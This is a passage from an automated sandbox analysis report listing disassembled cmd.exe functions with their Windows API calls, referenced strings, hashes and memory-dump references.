                                                                                          • Part of subcall function 00D687CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D87460,00000001), ref: 00D6881B
                                                                                          • Part of subcall function 00D687CA: _get_osfhandle.MSVCRT ref: 00D68828
                                                                                          • Part of subcall function 00D687CA: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68830
                                                                                          • Part of subcall function 00D687CA: _get_osfhandle.MSVCRT ref: 00D6883C
                                                                                          • Part of subcall function 00D687CA: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68844
                                                                                          • Part of subcall function 00D687CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D6886A
                                                                                          • Part of subcall function 00D687CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D688A5
                                                                                        • _setjmp3.MSVCRT ref: 00D7EA5E
                                                                                        Strings
                                                                                        • Software\Policies\Microsoft\Windows\System, xrefs: 00D70A00
                                                                                        • DisableCMD, xrefs: 00D7E9D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLeaveValueexitmemset
                                                                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                        • API String ID: 1095417628-1920437939
                                                                                        • Opcode ID: bb68e5229f3a61b7ed3c0e4f972b5d9a4aa66093764e8200e12a59978c334cbf
                                                                                        • Instruction ID: 537eaa3825b2bd37217b6552ad6828823cc16c2da722080a04bbd3167a148664
                                                                                        • Opcode Fuzzy Hash: bb68e5229f3a61b7ed3c0e4f972b5d9a4aa66093764e8200e12a59978c334cbf
                                                                                        • Instruction Fuzzy Hash: 2571A871600305BFEB11AB749C46A7F7BA9EF09344B18852AF50AE22A1FB35CC41CB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6E0B0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 308COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$iswspace
                                                                                        • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                        • API String ID: 759518647-875390083
                                                                                        • Opcode ID: a199245dcd1f82f081f3833859370d795bddff708126b1149717e6f136b2505e
                                                                                        • Instruction ID: c937ea721e5968ef8f4ae6a77af3e19e7e7aa3df1c9657bbd4071f8bd2befaeb
                                                                                        • Opcode Fuzzy Hash: a199245dcd1f82f081f3833859370d795bddff708126b1149717e6f136b2505e
                                                                                        • Instruction Fuzzy Hash: 36A1F6347443428BDB34AB79AC1A73A3364EF81714F18842EF58A866D0EBF5D841D736
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6CF10 Relevance: 33.7, APIs: 15, Strings: 4, Instructions: 446COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswdigit$iswspacewcschr$_setjmp3
                                                                                        • String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
                                                                                        • API String ID: 684130364-3872429996
                                                                                        • Opcode ID: bfaafb8fff07e5e6002460f9e5ec0e26ce5f6a8793b440bd59c7b85696d71e09
                                                                                        • Instruction ID: d71f5adbe8ae889dc9e4fe6630bb71b4cc443bbada71a524551e92ce77d791b4
                                                                                        • Opcode Fuzzy Hash: bfaafb8fff07e5e6002460f9e5ec0e26ce5f6a8793b440bd59c7b85696d71e09
                                                                                        • Instruction Fuzzy Hash: ECE1DDB1F013119BCB209F69F98937A77A2EF16344F284026E885D7391E339CD4587BA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6EC2E Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00D8E590,00002000,?,00DA8BF0,00000000,?,?,00D68F0D), ref: 00D6EC51
                                                                                        • _wcsicmp.MSVCRT ref: 00D6EC77
                                                                                        • _wcsicmp.MSVCRT ref: 00D6EC8D
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECA3
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECB9
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECCF
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECE5
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECF7
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ED0D
                                                                                          • Part of subcall function 00D69310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00D8E590,?,00002000), ref: 00D69342
                                                                                          • Part of subcall function 00D69310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D69356
                                                                                          • Part of subcall function 00D69310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D6936A
                                                                                          • Part of subcall function 00D69310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D6937E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                                        • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                        • API String ID: 2447294730-2301591722
                                                                                        • Opcode ID: e391d446db0bf7bc80f56537b9ef8cbcd469ff0bb77d38608967195963893086
                                                                                        • Instruction ID: 4250191c739897480f439146cdb40dff1991a25dd2ae690fa101aec31adcf544
                                                                                        • Opcode Fuzzy Hash: e391d446db0bf7bc80f56537b9ef8cbcd469ff0bb77d38608967195963893086
                                                                                        • Instruction Fuzzy Hash: CF31E736208702AFE7185725AC1EA7B3B9DEB8B325B18451DF506D01D0FFA4D411CA7A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D89C2E Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 250COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcsupr.MSVCRT ref: 00D89CC8
                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00D89D22
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00D89D2A
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D89D3A
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D89D50
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D89D58
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D89D68
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D89D7C
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D89DDB
                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00D89DE2
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00D89DF2
                                                                                        • towupper.MSVCRT ref: 00D89E13
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        • wcschr.MSVCRT ref: 00D89E6A
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00D89E9B
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00D89EA9
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                        • String ID: <noalias>$CMD.EXE
                                                                                        • API String ID: 2015057810-1690691951
                                                                                        • Opcode ID: b5190520e566cde000b02238943d40a364fb6b9066c3b5a41b3f4c33cb347636
                                                                                        • Instruction ID: 035d981029111f470c55486899cb0179d4ce3e29e7b05d68dc27e0bccbbfda48
                                                                                        • Opcode Fuzzy Hash: b5190520e566cde000b02238943d40a364fb6b9066c3b5a41b3f4c33cb347636
                                                                                        • Instruction Fuzzy Hash: CB81F472A00214ABCF15ABB8DC54AFEBBB9EF49710F1C0119F842E7290EB719801C775
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6790C Relevance: 28.7, APIs: 19, Instructions: 208COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D69A11: _get_osfhandle.MSVCRT ref: 00D69A1C
                                                                                          • Part of subcall function 00D69A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D6793A,00000104,?), ref: 00D69A2B
                                                                                          • Part of subcall function 00D69A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A47
                                                                                          • Part of subcall function 00D69A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A56
                                                                                          • Part of subcall function 00D69A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A61
                                                                                          • Part of subcall function 00D69A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A6A
                                                                                        • _get_osfhandle.MSVCRT ref: 00D67943
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D67951
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00DA0AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 00D679BE
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00D67A1C
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D67A27
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                        • String ID:
                                                                                        • API String ID: 2173784998-0
                                                                                        • Opcode ID: c88650f132d25626c0c660ef99f3acc5fdc85d1daf6de55c07332e594fd74a90
                                                                                        • Instruction ID: e50b3ba87948b8f7af282f872e1afd906a217d914933788e7f5ae0282cb82bc6
                                                                                        • Opcode Fuzzy Hash: c88650f132d25626c0c660ef99f3acc5fdc85d1daf6de55c07332e594fd74a90
                                                                                        • Instruction Fuzzy Hash: 1C718E71D00218AFCB15DFA9DC88ABEBBB9FF49301F15452AF906E6254EB348944CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D82859 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00D82931
                                                                                        • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00D82998
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentFormatMessageThread
                                                                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                        • API String ID: 2411632146-3173542853
                                                                                        • Opcode ID: 61ab78a1a2a44f859db3621408a304520dd8e45f0492a1d7c8c4d8110b43db52
                                                                                        • Instruction ID: fa08c26725be72ce1a47b87d902c557585372dd1a698d2b05cfd2922a3f0f143
                                                                                        • Opcode Fuzzy Hash: 61ab78a1a2a44f859db3621408a304520dd8e45f0492a1d7c8c4d8110b43db52
                                                                                        • Instruction Fuzzy Hash: 2D51E2B1940304ABDB347F698C4AE3BB7B8EF55B00F08455DF54A92252EA71EA94CF31
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D70590 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 181fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00D7B7DB,0000000C,00000004,00000080,00000000), ref: 00D705FF
                                                                                        • _open_osfhandle.MSVCRT ref: 00D70613
                                                                                        • _wcsicmp.MSVCRT ref: 00D70663
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00D70695
                                                                                        • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00D706D3
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00D706FB
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00D70717
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00D7E89D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                                        • String ID: con
                                                                                        • API String ID: 58404892-4257191772
                                                                                        • Opcode ID: 8f2fb33a0d29c7a2ea3680e5aa7170f34bf1ea56cf1edf8d1094e0814d94b949
                                                                                        • Instruction ID: 9efdc73c26367998a68180fe8f371e271964cf3e231f57f91892c2e58bd67607
                                                                                        • Opcode Fuzzy Hash: 8f2fb33a0d29c7a2ea3680e5aa7170f34bf1ea56cf1edf8d1094e0814d94b949
                                                                                        • Instruction Fuzzy Hash: D751EB70A00204EFDB109B98DC49BBE7BB8EB85720F54831AF519E62D0E775C911CB76
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D700E9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D7011A
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00D70156
                                                                                          • Part of subcall function 00D6EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00D8E590,00002000,?,00DA8BF0,00000000,?,?,00D68F0D), ref: 00D6EC51
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6EC77
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6EC8D
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECA3
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECB9
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECCF
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECE5
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECF7
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ED0D
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D701DB
                                                                                        • exit.MSVCRT ref: 00D7E621
                                                                                        • _wcsupr.MSVCRT ref: 00D7E683
                                                                                        • _wcsicmp.MSVCRT ref: 00D7E71A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                        • API String ID: 2336066422-4197029667
                                                                                        • Opcode ID: 32daf35868924326412a09fbf1aa2dc2361e707aa8615f61f62961283e63c624
                                                                                        • Instruction ID: 10cbccbf5de587007be5672110d61bc4b6b8e15fa514615610b5c5db8b3232e7
                                                                                        • Opcode Fuzzy Hash: 32daf35868924326412a09fbf1aa2dc2361e707aa8615f61f62961283e63c624
                                                                                        • Instruction Fuzzy Hash: 9D51B234B003168BDF18DB64CC556BE7765EF64304F5989A9A80AE7280FF70DE41CAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D68BC7 Relevance: 24.3, APIs: 16, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D75A2E: memset.MSVCRT ref: 00D75A5A
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000,?,00000104,?), ref: 00D68C7A
                                                                                        • towupper.MSVCRT ref: 00D68C8F
                                                                                        • iswalpha.MSVCRT ref: 00D68CA4
                                                                                        • towupper.MSVCRT ref: 00D68CC4
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00D68CF0
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D68D93
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D68DE0
                                                                                        • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00D68E11
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D7B6AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                                        • String ID:
                                                                                        • API String ID: 1133067188-0
                                                                                        • Opcode ID: 279740eb2bd44290527da8e5f7cfdb4ea1eacbd598c2266da174159d72b8bb9f
                                                                                        • Instruction ID: 5f38d4cc6803956e3cde7a869690b52d3ae202bf516aeec72685332ed40aac22
                                                                                        • Opcode Fuzzy Hash: 279740eb2bd44290527da8e5f7cfdb4ea1eacbd598c2266da174159d72b8bb9f
                                                                                        • Instruction Fuzzy Hash: B0B1AA30A002158BDB28EB64CD45BBDB374EF54320F58866AE55AE7290FB70DE84DB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8C5F2 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D8C62E
                                                                                        • memset.MSVCRT ref: 00D8C656
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00D8C6C7
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00D8C6E6
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00D8C72A
                                                                                        • _wcsicmp.MSVCRT ref: 00D8C747
                                                                                        • _wcsicmp.MSVCRT ref: 00D8C76C
                                                                                        • _wcsicmp.MSVCRT ref: 00D8C794
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8C7B3
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8C7C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                        • String ID: CSVFS$NTFS$REFS
                                                                                        • API String ID: 3510147486-2605508654
                                                                                        • Opcode ID: 669be5de1c7f900845c87c33262a43a401d13bad82b7ad127ad43270eff829a8
                                                                                        • Instruction ID: 60a7d5aec29578f5a65f40d685216b22697b647dfc2ca895e1d49e765fc32732
                                                                                        • Opcode Fuzzy Hash: 669be5de1c7f900845c87c33262a43a401d13bad82b7ad127ad43270eff829a8
                                                                                        • Instruction Fuzzy Hash: 385153B1A10219ABDB20DB65DC89EAFBBB8EF45344F0810A9E509D3140E774DE84CF75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D69789 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
